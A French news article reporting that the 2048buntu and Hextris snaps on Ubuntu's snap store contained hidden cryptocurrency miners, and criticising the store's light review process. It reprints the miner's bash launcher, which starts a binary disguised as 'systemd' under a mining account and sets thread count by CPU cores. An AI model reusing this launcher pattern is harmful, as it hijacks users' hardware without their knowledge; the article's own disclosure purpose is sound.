L’époque où il fallait systématiquement lancer le terminal et taper un sudo pour installer une application est révolue dans l’univers de Linux. L’opération est grandement facilitée par la disponibilité de gestionnaires d’applications qui permettent la prise en charge d’une catégorie particulière de paquetage dénommée snaps. Un utilisateur attire l’attention de la communauté sur la potentielle présence de logiciels malveillants au sein du snap store de la distribution Linux maintenue par Canonical.
En fait il est question de bien faire comprendre que la facilité avec laquelle les snaps peuvent être installés s’accompagne d’un revers. Dans le cas d’espèce, l’utilisateur qui fait usage du pseudonyme tawirdur sur GitHub tire la sonnette d’alarme sur le fait que l’application peut ne pas être saine. À l’heure où les monnaies cryptographiques ont le vent en poupe, des développeurs veulent se faire de l’argent sur le dos des ressources matérielles des utilisateurs de snaps et ce, à leur insu. Tawirdur a détecté que le snap 2048buntu contient un mineur de monnaies cryptographiques.
D’après ce que rapporte le site spécialisé Linux Uprising, l’application Hextris est dans la même situation. Tawirdur a publié une copie du script d’initialisation du mineur de monnaie cryptographique au sein du snap 2048buntu.
| Code : |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
} |
Des cas d’infections sur l’App Store ou sur le Play Store sont rapportés de temps à autre malgré le processus de revue ou les restrictions mises en place par Apple et Google. Retrouver un malware au sein d’une boutique d’applications ne relève donc pas du scoop. Seulement, l’aisance avec laquelle n’importe qui peut publier une application sur le snap store d’Ubuntu interpelle. Il n’y a qu’à jeter un œil à la documentation liée pour se rendre compte que le tour est joué en trois étapes toutes simples ; pas de mention du terme contrôle par l’équipe en charge de la boutique d’applications.
Il s’agit d’un problème quand on sait que certains snaps peuvent être publiés sous licence propriétaire pour compliquer la revue du code source à laquelle la communauté se livre de façon traditionnelle. Nicolas Tomb a publié le snap 2048buntu – un jeu développé par l’utilisateur qui fait usage du pseudonyme iirelu sur GitHub – sous licence MIT. La présence d’un mineur de cryptomonnaie en son sein peut donc bien être interprétée comme une intention manifeste de nuire.
L’équipe en charge de la boutique de snaps gère les signalements au fur et à mesure qu’ils sont remontés par les utilisateurs. À date, les snaps 2048buntu et Hextris sont écartés et les investigations se poursuivent.
Sources : linuxuprising
